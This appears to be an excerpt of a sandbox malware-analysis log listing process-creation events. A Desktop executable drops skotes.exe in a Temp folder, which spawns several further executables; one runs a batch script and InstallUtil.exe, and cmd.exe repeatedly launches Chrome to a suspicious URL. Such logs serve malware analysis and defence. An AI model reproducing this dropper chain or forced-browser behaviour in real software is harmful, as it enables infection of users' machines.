Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1156,i,5154185688367289602,11407614901677859174,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=692 --field-trial-handle=2012,i,5788619707603885448,5455322155689001163,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2004,i,13036272579540178643,1927237139647604030,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2008,i,3918962276335397993,18229504157229042942,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2000,i,12795265570595023803,2009076803051335294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1972,i,10677569344053674716,7012595910923912148,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2016,i,6451084168294191247,3303557760454261359,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1980,i,1857441977012259282,17901089399641908308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1992,i,13675614276573810495,14474061813535694310,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,7487110070847316896,5582251863534710150,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1168 --field-trial-handle=2028,i,13790200691533269936,14390321029282639858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=2044,i,12705238517774536685,12117524317393481054,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2008,i,418568306607350609,5560649611066257662,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1468 --field-trial-handle=1744,i,11295412607946737316,9054402318779687979,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,17020493693857119135,5398933278766730022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2064,i,3078106045737069916,8196321467453170590,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2012,i,15081096063514957223,8890955275309698934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Users\user\Desktop\lIocM276SA.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe "C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe "C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe "C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe "C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
